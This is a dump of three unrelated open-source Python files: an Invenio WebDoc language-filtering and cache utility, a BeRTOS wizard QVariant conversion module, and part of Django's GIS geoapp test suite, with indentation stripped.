filtered_html_texts = [(html_text[0], \
(html_text[1] != html_texts[CFG_SITE_LANG][1] and html_text[1]) or None, \
(html_text[2] != html_texts[CFG_SITE_LANG][2] and html_text[2]) or None, \
(html_text[3] != html_texts[CFG_SITE_LANG][3] and html_text[3]) or None, \
(html_text[4] != html_texts[CFG_SITE_LANG][4] and html_text[4]) or None, \
(html_text[5] != html_texts[CFG_SITE_LANG][5] and html_text[5]) or None, \
(html_text[6] != html_texts[CFG_SITE_LANG][6] and html_text[6]) or None)
for html_text in html_texts.values() \
if html_text[0] != CFG_SITE_LANG]
filtered_html_texts.append(html_texts[CFG_SITE_LANG])
else:
filtered_html_texts = html_texts.values()
return filtered_html_texts
def write_cache_file(filename, webdoc_cache_dir, filebody, verbose=0):
"""Write a file inside WebDoc cache dir.
Raise an exception if not possible
"""
# open file:
mymkdir(webdoc_cache_dir)
fullfilename = webdoc_cache_dir + os.sep + filename
if filebody is None:
filebody = ''
os.umask(022)
f = open(fullfilename, "w")
f.write(filebody)
f.close()
if verbose > 2:
print 'Written %s' % fullfilename
def get_mo_last_modification():
"""
Returns the timestamp of the most recently modified mo (compiled
po) file
"""
# Take one of the mo files. They are all installed at the same
# time, so last modication date should be the same
mo_file = '%s/share/locale/%s/LC_MESSAGES/invenio.mo' % (CFG_PREFIX, CFG_SITE_LANG)
if os.path.exists(os.path.abspath(mo_file)):
return os.stat(mo_file).st_mtime
else:
return 0
def filter_languages(text, ln='en', defined_tags=None):
"""
Filters the language tags that do not correspond to the specified language.
Eg: <lang><en>A book</en><de>Ein Buch</de></lang> will return
- with ln = 'de': "Ein Buch"
- with ln = 'en': "A book"
- with ln = 'fr': "A book"
Also replace variables such as <CFG_SITE_URL> and <CFG_SITE_NAME_INTL> inside
<lang><..><..></lang> tags in order to print them with the correct
language
@param text: the input text
@param ln: the language that is NOT filtered out from the input
@return: the input text as string with unnecessary languages filtered out
@see: bibformat_engine.py, from where this function was originally extracted
"""
# First define search_lang_tag(match) and clean_language_tag(match), used
# in re.sub() function
def search_lang_tag(match):
"""
Searches for the <lang>...</lang> tag and remove inner localized tags
such as <en>, <fr>, that are not current_lang.
If current_lang cannot be found inside <lang> ... </lang>, try to use 'CFG_SITE_LANG'
@param match: a match object corresponding to the special tag that must be interpreted
"""
current_lang = ln
# If <lang keep=all> is used, keep all empty line (this is
# currently undocumented and behaviour might change)
keep = False
if match.group("keep") is not None:
keep = True
def clean_language_tag(match):
"""
Return tag text content if tag language of match is output language.
Called by substitution in 'filter_languages(...)'
@param match: a match object corresponding to the special tag that must be interpreted
"""
if match.group('lang') == current_lang or \
keep == True:
return match.group('translation')
else:
return ""
# End of clean_language_tag(..)
lang_tag_content = match.group("langs")
# Try to find tag with current lang. If it does not exists,
# then try to look for CFG_SITE_LANG. If still does not exist, use
# 'en' as current_lang
pattern_current_lang = re.compile(r"<(" + current_lang + \
r")\s*>(.*?)(</"+current_lang+r"\s*>)",
re.IGNORECASE | re.DOTALL)
if re.search(pattern_current_lang, lang_tag_content) is None:
current_lang = CFG_SITE_LANG
# Can we find translation in 'CFG_SITE_LANG'?
if re.search(pattern_CFG_SITE_LANG, lang_tag_content) is None:
current_lang = 'en'
cleaned_lang_tag = ln_pattern.sub(clean_language_tag, lang_tag_content)
# Remove empty lines
# Only if 'keep' has not been set
if keep == False:
stripped_text = ''
for line in cleaned_lang_tag.splitlines(True):
if line.strip():
stripped_text += line
cleaned_lang_tag = stripped_text
return cleaned_lang_tag
# End of search_lang_tag(..)
filtered_text = pattern_lang.sub(search_lang_tag, text)
return filtered_text
def usage(exitcode=1, msg=""):
"""Prints usage info."""
if msg:
sys.stderr.write("Error: %s.\n" % msg)
sys.stderr.write("Usage: %s [options] <webdocname>\n" % sys.argv[0])
sys.stderr.write(" -h, --help \t\t Print this help.\n")
sys.stderr.write(" -V, --version \t\t Print version information.\n")
sys.stderr.write(" -v, --verbose=LEVEL \t\t Verbose level (0=min,1=normal,9=max).\n")
sys.stderr.write(" -l, --language=LN1,LN2,.. \t\t Language(s) to process (default all)\n")
sys.stderr.write(" -m, --mode=MODE \t\t Update cache mode(0=Never,1=if necessary,2=always) (default 2)\n")
sys.stderr.write("\n")
sys.stderr.write(" Example: webdoc search-guide\n")
sys.stderr.write(" Example: webdoc -l en,fr search-guide\n")
sys.stderr.write(" Example: webdoc -m 1 search-guide")
sys.stderr.write("\n")
sys.exit(exitcode)
def main():
"""
main entry point for webdoc via command line
"""
options = {'language':CFG_SITE_LANGS, 'verbose':1, 'mode':2}
try:
opts, args = getopt.getopt(sys.argv[1:],
"hVv:l:m:",
["help",
"version",
"verbose=",
"language=",
"mode="])
except getopt.GetoptError, err:
usage(1, err)
try:
for opt in opts:
if opt[0] in ["-h", "--help"]:
usage(0)
elif opt[0] in ["-V", "--version"]:
print __revision__
sys.exit(0)
elif opt[0] in ["-v", "--verbose"]:
options["verbose"] = int(opt[1])
elif opt[0] in ["-l", "--language"]:
options["language"] = [wash_language(lang.strip().lower()) \
for lang in opt[1].split(',') \
if lang in CFG_SITE_LANGS]
elif opt[0] in ["-m", "--mode"]:
options["mode"] = opt[1]
except StandardError, e:
usage(e)
try:
options["mode"] = int(options["mode"])
except ValueError:
usage(1, "Mode must be an integer")
if len(args) > 0:
options["webdoc"] = args[0]
if not options.has_key("webdoc"):
usage(0)
# check if webdoc exists
infos = get_webdoc_info(options["webdoc"])
if infos[0] is None:
usage(1, "Could not find %s" % options["webdoc"])
update_webdoc_cache(webdoc=options["webdoc"],
mode=options["mode"],
verbose=options["verbose"],
languages=options["language"])
if __name__ == "__main__":
main()
| gpl-2.0 |
lucaotta/bertos | wizard/qvariant_converter_old.py | 7 | 3250 | #!/usr/bin/env python
# encoding: utf-8
#
# This file is part of BeRTOS.
#
# Bertos is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
# As a special exception, you may use this file as part of a free software
# library without restriction. Specifically, if other files instantiate
# templates or use macros or inline functions from this file, or you compile
# this file and link it with other files to produce an executable, this
# file does not by itself cause the resulting executable to be covered by
# the GNU General Public License. This exception does not however
# invalidate any other reasons why the executable file might be covered by
# the GNU General Public License.
#
# Copyright 2008 Develer S.r.l. (http://www.develer.com/)
#
#
# Author: Lorenzo Berni <duplo@develer.com>
#
"""
Awful module for the conversion from python types to qvariant, for make the wizard compatible with older version of pyqt (<= 4.4.3)
"""
from PyQt4.QtCore import *
import pickle
def getString(qvariant):
if type(qvariant) == str or type(qvariant) == unicode:
string = qvariant
else:
string = unicode(qvariant.toString())
return string
def convertString(string):
return QVariant(string)
def getStringList(qvariant):
string_list = []
if type(qvariant) == list:
string_list = qvariant
else:
for element in qvariant.toStringList():
string_list.append(unicode(element))
return string_list
def convertStringList(string_list):
result = []
for element in string_list:
result.append(QString(element))
return QVariant(QStringList(result))
def getStringDict(qvariant):
a = str(qvariant.toByteArray())
if len(a) == 0:
dict_str_str = {}
else:
dict_str_str = pickle.loads(a)
return dict_str_str
def convertStringDict(dict_str_str):
a = pickle.dumps(dict_str_str)
return QVariant(QByteArray(a))
def getBool(qvariant):
return qvariant.toBool()
def convertBool(boolean):
return QVariant(boolean)
def getBoolDict(qvariant):
a = str(qvariant.toByteArray())
if len(a) == 0:
dict_str_bool = {}
else:
dict_str_bool = pickle.loads(a)
return dict_str_bool
def convertBoolDict(dict_str_bool):
a = pickle.dumps(dict_str_bool)
return QVariant(QByteArray(a))
def getDict(qvariant):
a = str(qvariant.toByteArray())
if len(a) == 0:
dict_str_bool = {}
else:
dict_str_bool = pickle.loads(a)
return dict_str_bool
def convertDict(dict_str_variant):
a = pickle.dumps(dict_str_variant)
return QVariant(QByteArray(a))
| gpl-2.0 |
tjsavage/tmrwmedia | django/contrib/gis/tests/geoapp/tests.py | 36 | 35330 | import re, os, unittest
from django.db import connection
from django.contrib.gis import gdal
from django.contrib.gis.geos import *
from django.contrib.gis.measure import Distance
from django.contrib.gis.tests.utils import \
no_mysql, no_oracle, no_postgis, no_spatialite, \
mysql, oracle, postgis, spatialite
from django.test import TestCase
from models import Country, City, PennsylvaniaCity, State, Track
if not spatialite:
from models import Feature, MinusOneSRID
class GeoModelTest(TestCase):
def test01_fixtures(self):
"Testing geographic model initialization from fixtures."
# Ensuring that data was loaded from initial data fixtures.
self.assertEqual(2, Country.objects.count())
self.assertEqual(8, City.objects.count())
self.assertEqual(2, State.objects.count())
def test02_proxy(self):
"Testing Lazy-Geometry support (using the GeometryProxy)."
## Testing on a Point
pnt = Point(0, 0)
nullcity = City(name='NullCity', point=pnt)
nullcity.save()
# Making sure TypeError is thrown when trying to set with an
# incompatible type.
for bad in [5, 2.0, LineString((0, 0), (1, 1))]:
try:
nullcity.point = bad
except TypeError:
pass
else:
self.fail('Should throw a TypeError')
# Now setting with a compatible GEOS Geometry, saving, and ensuring
# the save took, notice no SRID is explicitly set.
new = Point(5, 23)
nullcity.point = new
# Ensuring that the SRID is automatically set to that of the
# field after assignment, but before saving.
self.assertEqual(4326, nullcity.point.srid)
nullcity.save()
# Ensuring the point was saved correctly after saving
self.assertEqual(new, City.objects.get(name='NullCity').point)
# Setting the X and Y of the Point
nullcity.point.x = 23
nullcity.point.y = 5
# Checking assignments pre & post-save.
self.assertNotEqual(Point(23, 5), City.objects.get(name='NullCity').point)
nullcity.save()
self.assertEqual(Point(23, 5), City.objects.get(name='NullCity').point)
nullcity.delete()
## Testing on a Polygon
shell = LinearRing((0, 0), (0, 100), (100, 100), (100, 0), (0, 0))
inner = LinearRing((40, 40), (40, 60), (60, 60), (60, 40), (40, 40))
# Creating a State object using a built Polygon
ply = Polygon(shell, inner)
nullstate = State(name='NullState', poly=ply)
self.assertEqual(4326, nullstate.poly.srid) # SRID auto-set from None
nullstate.save()
ns = State.objects.get(name='NullState')
self.assertEqual(ply, ns.poly)
# Testing the `ogr` and `srs` lazy-geometry properties.
if gdal.HAS_GDAL:
self.assertEqual(True, isinstance(ns.poly.ogr, gdal.OGRGeometry))
self.assertEqual(ns.poly.wkb, ns.poly.ogr.wkb)
self.assertEqual(True, isinstance(ns.poly.srs, gdal.SpatialReference))
self.assertEqual('WGS 84', ns.poly.srs.name)
# Changing the interior ring on the poly attribute.
new_inner = LinearRing((30, 30), (30, 70), (70, 70), (70, 30), (30, 30))
ns.poly[1] = new_inner
ply[1] = new_inner
self.assertEqual(4326, ns.poly.srid)
ns.save()
self.assertEqual(ply, State.objects.get(name='NullState').poly)
ns.delete()
def test03a_kml(self):
"Testing KML output from the database using GeoQuerySet.kml()."
# Only PostGIS supports KML serialization
if not postgis:
self.assertRaises(NotImplementedError, State.objects.all().kml, field_name='poly')
return
# Should throw a TypeError when trying to obtain KML from a
# non-geometry field.
qs = City.objects.all()
self.assertRaises(TypeError, qs.kml, 'name')
# The reference KML depends on the version of PostGIS used
# (the output stopped including altitude in 1.3.3).
if connection.ops.spatial_version >= (1, 3, 3):
ref_kml = '<Point><coordinates>-104.609252,38.255001</coordinates></Point>'
else:
ref_kml = '<Point><coordinates>-104.609252,38.255001,0</coordinates></Point>'
# Ensuring the KML is as expected.
ptown1 = City.objects.kml(field_name='point', precision=9).get(name='Pueblo')
ptown2 = City.objects.kml(precision=9).get(name='Pueblo')
for ptown in [ptown1, ptown2]:
self.assertEqual(ref_kml, ptown.kml)
def test03b_gml(self):
"Testing GML output from the database using GeoQuerySet.gml()."
if mysql or spatialite:
self.assertRaises(NotImplementedError, Country.objects.all().gml, field_name='mpoly')
return
# Should throw a TypeError when tyring to obtain GML from a
# non-geometry field.
qs = City.objects.all()
self.assertRaises(TypeError, qs.gml, field_name='name')
ptown1 = City.objects.gml(field_name='point', precision=9).get(name='Pueblo')
ptown2 = City.objects.gml(precision=9).get(name='Pueblo')
if oracle:
# No precision parameter for Oracle :-/
gml_regex = re.compile(r'^<gml:Point srsName="SDO:4326" xmlns:gml="http://www.opengis.net/gml"><gml:coordinates decimal="\." cs="," ts=" ">-104.60925\d+,38.25500\d+ </gml:coordinates></gml:Point>')
for ptown in [ptown1, ptown2]:
self.failUnless(gml_regex.match(ptown.gml))
else:
gml_regex = re.compile(r'^<gml:Point srsName="EPSG:4326"><gml:coordinates>-104\.60925\d+,38\.255001</gml:coordinates></gml:Point>')
for ptown in [ptown1, ptown2]:
self.failUnless(gml_regex.match(ptown.gml))
def test03c_geojson(self):
"Testing GeoJSON output from the database using GeoQuerySet.geojson()."
# Only PostGIS 1.3.4+ supports GeoJSON.
if not connection.ops.geojson:
self.assertRaises(NotImplementedError, Country.objects.all().geojson, field_name='mpoly')
return
if connection.ops.spatial_version >= (1, 4, 0):
pueblo_json = '{"type":"Point","coordinates":[-104.609252,38.255001]}'
houston_json = '{"type":"Point","crs":{"type":"name","properties":{"name":"EPSG:4326"}},"coordinates":[-95.363151,29.763374]}'
victoria_json = '{"type":"Point","bbox":[-123.30519600,48.46261100,-123.30519600,48.46261100],"coordinates":[-123.305196,48.462611]}'
chicago_json = '{"type":"Point","crs":{"type":"name","properties":{"name":"EPSG:4326"}},"bbox":[-87.65018,41.85039,-87.65018,41.85039],"coordinates":[-87.65018,41.85039]}'
else:
pueblo_json = '{"type":"Point","coordinates":[-104.60925200,38.25500100]}'
houston_json = '{"type":"Point","crs":{"type":"EPSG","properties":{"EPSG":4326}},"coordinates":[-95.36315100,29.76337400]}'
victoria_json = '{"type":"Point","bbox":[-123.30519600,48.46261100,-123.30519600,48.46261100],"coordinates":[-123.30519600,48.46261100]}'
chicago_json = '{"type":"Point","crs":{"type":"EPSG","properties":{"EPSG":4326}},"bbox":[-87.65018,41.85039,-87.65018,41.85039],"coordinates":[-87.65018,41.85039]}'
# Precision argument should only be an integer
self.assertRaises(TypeError, City.objects.geojson, precision='foo')
# Reference queries and values.
# SELECT ST_AsGeoJson("geoapp_city"."point", 8, 0) FROM "geoapp_city" WHERE "geoapp_city"."name" = 'Pueblo';
self.assertEqual(pueblo_json, City.objects.geojson().get(name='Pueblo').geojson)
# 1.3.x: SELECT ST_AsGeoJson("geoapp_city"."point", 8, 1) FROM "geoapp_city" WHERE "geoapp_city"."name" = 'Houston';
# 1.4.x: SELECT ST_AsGeoJson("geoapp_city"."point", 8, 2) FROM "geoapp_city" WHERE "geoapp_city"."name" = 'Houston';
# This time we want to include the CRS by using the `crs` keyword.
self.assertEqual(houston_json, City.objects.geojson(crs=True, model_att='json').get(name='Houston').json)
# 1.3.x: SELECT ST_AsGeoJson("geoapp_city"."point", 8, 2) FROM "geoapp_city" WHERE "geoapp_city"."name" = 'Victoria';
# 1.4.x: SELECT ST_AsGeoJson("geoapp_city"."point", 8, 1) FROM "geoapp_city" WHERE "geoapp_city"."name" = 'Houston';
# This time we include the bounding box by using the `bbox` keyword.
self.assertEqual(victoria_json, City.objects.geojson(bbox=True).get(name='Victoria').geojson)
# 1.(3|4).x: SELECT ST_AsGeoJson("geoapp_city"."point", 5, 3) FROM "geoapp_city" WHERE "geoapp_city"."name" = 'Chicago';
# Finally, we set every available keyword.
self.assertEqual(chicago_json, City.objects.geojson(bbox=True, crs=True, precision=5).get(name='Chicago').geojson)
def test03d_svg(self):
"Testing SVG output using GeoQuerySet.svg()."
if mysql or oracle:
self.assertRaises(NotImplementedError, City.objects.svg)
return
self.assertRaises(TypeError, City.objects.svg, precision='foo')
# SELECT AsSVG(geoapp_city.point, 0, 8) FROM geoapp_city WHERE name = 'Pueblo';
svg1 = 'cx="-104.609252" cy="-38.255001"'
# Even though relative, only one point so it's practically the same except for
# the 'c' letter prefix on the x,y values.
svg2 = svg1.replace('c', '')
self.assertEqual(svg1, City.objects.svg().get(name='Pueblo').svg)
self.assertEqual(svg2, City.objects.svg(relative=5).get(name='Pueblo').svg)
@no_mysql
def test04_transform(self):
"Testing the transform() GeoManager method."
# Pre-transformed points for Houston and Pueblo.
htown = fromstr('POINT(1947516.83115183 6322297.06040572)', srid=3084)
ptown = fromstr('POINT(992363.390841912 481455.395105533)', srid=2774)
prec = 3 # Precision is low due to version variations in PROJ and GDAL.
# Asserting the result of the transform operation with the values in
# the pre-transformed points. Oracle does not have the 3084 SRID.
if not oracle:
h = City.objects.transform(htown.srid).get(name='Houston')
self.assertEqual(3084, h.point.srid)
self.assertAlmostEqual(htown.x, h.point.x, prec)
self.assertAlmostEqual(htown.y, h.point.y, prec)
p1 = City.objects.transform(ptown.srid, field_name='point').get(name='Pueblo')
p2 = City.objects.transform(srid=ptown.srid).get(name='Pueblo')
for p in [p1, p2]:
self.assertEqual(2774, p.point.srid)
self.assertAlmostEqual(ptown.x, p.point.x, prec)
self.assertAlmostEqual(ptown.y, p.point.y, prec)
@no_mysql
@no_spatialite # SpatiaLite does not have an Extent function
def test05_extent(self):
"Testing the `extent` GeoQuerySet method."
# Reference query:
# `SELECT ST_extent(point) FROM geoapp_city WHERE (name='Houston' or name='Dallas');`
# => BOX(-96.8016128540039 29.7633724212646,-95.3631439208984 32.7820587158203)
expected = (-96.8016128540039, 29.7633724212646, -95.3631439208984, 32.782058715820)
qs = City.objects.filter(name__in=('Houston', 'Dallas'))
extent = qs.extent()
for val, exp in zip(extent, expected):
self.assertAlmostEqual(exp, val, 4)
# Only PostGIS has support for the MakeLine aggregate.
@no_mysql
@no_oracle
@no_spatialite
def test06_make_line(self):
"Testing the `make_line` GeoQuerySet method."
# Ensuring that a `TypeError` is raised on models without PointFields.
self.assertRaises(TypeError, State.objects.make_line)
self.assertRaises(TypeError, Country.objects.make_line)
# Reference query:
# SELECT AsText(ST_MakeLine(geoapp_city.point)) FROM geoapp_city;
ref_line = GEOSGeometry('LINESTRING(-95.363151 29.763374,-96.801611 32.782057,-97.521157 34.464642,174.783117 -41.315268,-104.609252 38.255001,-95.23506 38.971823,-87.650175 41.850385,-123.305196 48.462611)', srid=4326)
self.assertEqual(ref_line, City.objects.make_line())
@no_mysql
def test09_disjoint(self):
"Testing the `disjoint` lookup type."
ptown = City.objects.get(name='Pueblo')
qs1 = City.objects.filter(point__disjoint=ptown.point)
self.assertEqual(7, qs1.count())
qs2 = State.objects.filter(poly__disjoint=ptown.point)
self.assertEqual(1, qs2.count())
self.assertEqual('Kansas', qs2[0].name)
def test10_contains_contained(self):
"Testing the 'contained', 'contains', and 'bbcontains' lookup types."
# Getting Texas, yes we were a country -- once ;)
texas = Country.objects.get(name='Texas')
# Seeing what cities are in Texas, should get Houston and Dallas,
# and Oklahoma City because 'contained' only checks on the
# _bounding box_ of the Geometries.
if not oracle:
qs = City.objects.filter(point__contained=texas.mpoly)
self.assertEqual(3, qs.count())
cities = ['Houston', 'Dallas', 'Oklahoma City']
for c in qs: self.assertEqual(True, c.name in cities)
# Pulling out some cities.
houston = City.objects.get(name='Houston')
wellington = City.objects.get(name='Wellington')
pueblo = City.objects.get(name='Pueblo')
okcity = City.objects.get(name='Oklahoma City')
lawrence = City.objects.get(name='Lawrence')
# Now testing contains on the countries using the points for
# Houston and Wellington.
tx = Country.objects.get(mpoly__contains=houston.point) # Query w/GEOSGeometry
nz = Country.objects.get(mpoly__contains=wellington.point.hex) # Query w/EWKBHEX
self.assertEqual('Texas', tx.name)
self.assertEqual('New Zealand', nz.name)
# Spatialite 2.3 thinks that Lawrence is in Puerto Rico (a NULL geometry).
if not spatialite:
ks = State.objects.get(poly__contains=lawrence.point)
self.assertEqual('Kansas', ks.name)
# Pueblo and Oklahoma City (even though OK City is within the bounding box of Texas)
# are not contained in Texas or New Zealand.
self.assertEqual(0, len(Country.objects.filter(mpoly__contains=pueblo.point))) # Query w/GEOSGeometry object
self.assertEqual((mysql and 1) or 0,
len(Country.objects.filter(mpoly__contains=okcity.point.wkt))) # Qeury w/WKT
# OK City is contained w/in bounding box of Texas.
if not oracle:
qs = Country.objects.filter(mpoly__bbcontains=okcity.point)
self.assertEqual(1, len(qs))
self.assertEqual('Texas', qs[0].name)
@no_mysql
def test11_lookup_insert_transform(self):
"Testing automatic transform for lookups and inserts."
# San Antonio in 'WGS84' (SRID 4326)
sa_4326 = 'POINT (-98.493183 29.424170)'
wgs_pnt = fromstr(sa_4326, srid=4326) # Our reference point in WGS84
# Oracle doesn't have SRID 3084, using 41157.
if oracle:
# San Antonio in 'Texas 4205, Southern Zone (1983, meters)' (SRID 41157)
# Used the following Oracle SQL to get this value:
# SELECT SDO_UTIL.TO_WKTGEOMETRY(SDO_CS.TRANSFORM(SDO_GEOMETRY('POINT (-98.493183 29.424170)', 4326), 41157)) FROM DUAL;
nad_wkt = 'POINT (300662.034646583 5416427.45974934)'
nad_srid = 41157
else:
# San Antonio in 'NAD83(HARN) / Texas Centric Lambert Conformal' (SRID 3084)
nad_wkt = 'POINT (1645978.362408288754523 6276356.025927528738976)' # Used ogr.py in gdal 1.4.1 for this transform
nad_srid = 3084
# Constructing & querying with a point from a different SRID. Oracle
# `SDO_OVERLAPBDYINTERSECT` operates differently from
# `ST_Intersects`, so contains is used instead.
nad_pnt = fromstr(nad_wkt, srid=nad_srid)
if oracle:
tx = Country.objects.get(mpoly__contains=nad_pnt)
else:
tx = Country.objects.get(mpoly__intersects=nad_pnt)
self.assertEqual('Texas', tx.name)
# Creating San Antonio. Remember the Alamo.
sa = City.objects.create(name='San Antonio', point=nad_pnt)
# Now verifying that San Antonio was transformed correctly
sa = City.objects.get(name='San Antonio')
self.assertAlmostEqual(wgs_pnt.x, sa.point.x, 6)
self.assertAlmostEqual(wgs_pnt.y, sa.point.y, 6)
# If the GeometryField SRID is -1, then we shouldn't perform any
# transformation if the SRID of the input geometry is different.
# SpatiaLite does not support missing SRID values.
if not spatialite:
m1 = MinusOneSRID(geom=Point(17, 23, srid=4326))
m1.save()
self.assertEqual(-1, m1.geom.srid)
@no_mysql
def test12_null_geometries(self):
"Testing NULL geometry support, and the `isnull` lookup type."
# Creating a state with a NULL boundary.
State.objects.create(name='Puerto Rico')
# Querying for both NULL and Non-NULL values.
nullqs = State.objects.filter(poly__isnull=True)
validqs = State.objects.filter(poly__isnull=False)
# Puerto Rico should be NULL (it's a commonwealth unincorporated territory)
self.assertEqual(1, len(nullqs))
self.assertEqual('Puerto Rico', nullqs[0].name)
# The valid states should be Colorado & Kansas
self.assertEqual(2, len(validqs))
state_names = [s.name for s in validqs]
self.assertEqual(True, 'Colorado' in state_names)
self.assertEqual(True, 'Kansas' in state_names)
# Saving another commonwealth w/a NULL geometry.
nmi = State.objects.create(name='Northern Mariana Islands', poly=None)
self.assertEqual(nmi.poly, None)
# Assigning a geomery and saving -- then UPDATE back to NULL.
nmi.poly = 'POLYGON((0 0,1 0,1 1,1 0,0 0))'
nmi.save()
State.objects.filter(name='Northern Mariana Islands').update(poly=None)
self.assertEqual(None, State.objects.get(name='Northern Mariana Islands').poly)
# Only PostGIS has `left` and `right` lookup types.
@no_mysql
@no_oracle
@no_spatialite
def test13_left_right(self):
"Testing the 'left' and 'right' lookup types."
# Left: A << B => true if xmax(A) < xmin(B)
# Right: A >> B => true if xmin(A) > xmax(B)
# See: BOX2D_left() and BOX2D_right() in lwgeom_box2dfloat4.c in PostGIS source.
# Getting the borders for Colorado & Kansas
co_border = State.objects.get(name='Colorado').poly
ks_border = State.objects.get(name='Kansas').poly
# Note: Wellington has an 'X' value of 174, so it will not be considered
# to the left of CO.
# These cities should be strictly to the right of the CO border.
cities = ['Houston', 'Dallas', 'Oklahoma City',
'Lawrence', 'Chicago', 'Wellington']
qs = City.objects.filter(point__right=co_border)
self.assertEqual(6, len(qs))
for c in qs: self.assertEqual(True, c.name in cities)
# These cities should be strictly to the right of the KS border.
cities = ['Chicago', 'Wellington']
qs = City.objects.filter(point__right=ks_border)
self.assertEqual(2, len(qs))
for c in qs: self.assertEqual(True, c.name in cities)
# Note: Wellington has an 'X' value of 174, so it will not be considered
# to the left of CO.
vic = City.objects.get(point__left=co_border)
self.assertEqual('Victoria', vic.name)
cities = ['Pueblo', 'Victoria']
qs = City.objects.filter(point__left=ks_border)
self.assertEqual(2, len(qs))
for c in qs: self.assertEqual(True, c.name in cities)
def test14_equals(self):
"Testing the 'same_as' and 'equals' lookup types."
pnt = fromstr('POINT (-95.363151 29.763374)', srid=4326)
c1 = City.objects.get(point=pnt)
c2 = City.objects.get(point__same_as=pnt)
c3 = City.objects.get(point__equals=pnt)
for c in [c1, c2, c3]: self.assertEqual('Houston', c.name)
@no_mysql
def test15_relate(self):
"Testing the 'relate' lookup type."
# To make things more interesting, we will have our Texas reference point in
# different SRIDs.
pnt1 = fromstr('POINT (649287.0363174 4177429.4494686)', srid=2847)
pnt2 = fromstr('POINT(-98.4919715741052 29.4333344025053)', srid=4326)
# Not passing in a geometry as first param shoud
# raise a type error when initializing the GeoQuerySet
self.assertRaises(ValueError, Country.objects.filter, mpoly__relate=(23, 'foo'))
# Making sure the right exception is raised for the given
# bad arguments.
for bad_args, e in [((pnt1, 0), ValueError), ((pnt2, 'T*T***FF*', 0), ValueError)]:
qs = Country.objects.filter(mpoly__relate=bad_args)
self.assertRaises(e, qs.count)
# Relate works differently for the different backends.
if postgis or spatialite:
contains_mask = 'T*T***FF*'
within_mask = 'T*F**F***'
intersects_mask = 'T********'
elif oracle:
contains_mask = 'contains'
within_mask = 'inside'
# TODO: This is not quite the same as the PostGIS mask above
intersects_mask = 'overlapbdyintersect'
# Testing contains relation mask.
self.assertEqual('Texas', Country.objects.get(mpoly__relate=(pnt1, contains_mask)).name)
self.assertEqual('Texas', Country.objects.get(mpoly__relate=(pnt2, contains_mask)).name)
# Testing within relation mask.
ks = State.objects.get(name='Kansas')
self.assertEqual('Lawrence', City.objects.get(point__relate=(ks.poly, within_mask)).name)
# Testing intersection relation mask.
if not oracle:
self.assertEqual('Texas', Country.objects.get(mpoly__relate=(pnt1, intersects_mask)).name)
self.assertEqual('Texas', Country.objects.get(mpoly__relate=(pnt2, intersects_mask)).name)
self.assertEqual('Lawrence', City.objects.get(point__relate=(ks.poly, intersects_mask)).name)
def test16_createnull(self):
"Testing creating a model instance and the geometry being None"
c = City()
self.assertEqual(c.point, None)
@no_mysql
def test17_unionagg(self):
"Testing the `unionagg` (aggregate union) GeoManager method."
tx = Country.objects.get(name='Texas').mpoly
# Houston, Dallas -- Oracle has different order.
union1 = fromstr('MULTIPOINT(-96.801611 32.782057,-95.363151 29.763374)')
union2 = fromstr('MULTIPOINT(-96.801611 32.782057,-95.363151 29.763374)')
qs = City.objects.filter(point__within=tx)
self.assertRaises(TypeError, qs.unionagg, 'name')
# Using `field_name` keyword argument in one query and specifying an
# order in the other (which should not be used because this is
# an aggregate method on a spatial column)
u1 = qs.unionagg(field_name='point')
u2 = qs.order_by('name').unionagg()
tol = 0.00001
if oracle:
union = union2
else:
union = union1
self.assertEqual(True, union.equals_exact(u1, tol))
self.assertEqual(True, union.equals_exact(u2, tol))
qs = City.objects.filter(name='NotACity')
self.assertEqual(None, qs.unionagg(field_name='point'))
@no_spatialite # SpatiaLite does not support abstract geometry columns
def test18_geometryfield(self):
"Testing the general GeometryField."
Feature(name='Point', geom=Point(1, 1)).save()
Feature(name='LineString', geom=LineString((0, 0), (1, 1), (5, 5))).save()
Feature(name='Polygon', geom=Polygon(LinearRing((0, 0), (0, 5), (5, 5), (5, 0), (0, 0)))).save()
Feature(name='GeometryCollection',
geom=GeometryCollection(Point(2, 2), LineString((0, 0), (2, 2)),
Polygon(LinearRing((0, 0), (0, 5), (5, 5), (5, 0), (0, 0))))).save()
f_1 = Feature.objects.get(name='Point')
self.assertEqual(True, isinstance(f_1.geom, Point))
self.assertEqual((1.0, 1.0), f_1.geom.tuple)
f_2 = Feature.objects.get(name='LineString')
self.assertEqual(True, isinstance(f_2.geom, LineString))
self.assertEqual(((0.0, 0.0), (1.0, 1.0), (5.0, 5.0)), f_2.geom.tuple)
f_3 = Feature.objects.get(name='Polygon')
self.assertEqual(True, isinstance(f_3.geom, Polygon))
f_4 = Feature.objects.get(name='GeometryCollection')
self.assertEqual(True, isinstance(f_4.geom, GeometryCollection))
self.assertEqual(f_3.geom, f_4.geom[2])
@no_mysql
def test19_centroid(self):
"Testing the `centroid` GeoQuerySet method."
qs = State.objects.exclude(poly__isnull=True).centroid()
if oracle:
tol = 0.1
elif spatialite:
tol = 0.000001
else:
tol = 0.000000001
for s in qs:
self.assertEqual(True, s.poly.centroid.equals_exact(s.centroid, tol))
@no_mysql
def test20_pointonsurface(self):
"Testing the `point_on_surface` GeoQuerySet method."
# Reference values.
if oracle:
# SELECT SDO_UTIL.TO_WKTGEOMETRY(SDO_GEOM.SDO_POINTONSURFACE(GEOAPP_COUNTRY.MPOLY, 0.05)) FROM GEOAPP_COUNTRY;
ref = {'New Zealand' : fromstr('POINT (174.616364 -36.100861)', srid=4326),
'Texas' : fromstr('POINT (-103.002434 36.500397)', srid=4326),
}
elif postgis or spatialite:
# Using GEOSGeometry to compute the reference point on surface values
# -- since PostGIS also uses GEOS these should be the same.
ref = {'New Zealand' : Country.objects.get(name='New Zealand').mpoly.point_on_surface,
'Texas' : Country.objects.get(name='Texas').mpoly.point_on_surface
}
for c in Country.objects.point_on_surface():
if spatialite:
# XXX This seems to be a WKT-translation-related precision issue?
tol = 0.00001
else:
tol = 0.000000001
self.assertEqual(True, ref[c.name].equals_exact(c.point_on_surface, tol))
@no_mysql
@no_oracle
def test21_scale(self):
"Testing the `scale` GeoQuerySet method."
xfac, yfac = 2, 3
tol = 5 # XXX The low precision tolerance is for SpatiaLite
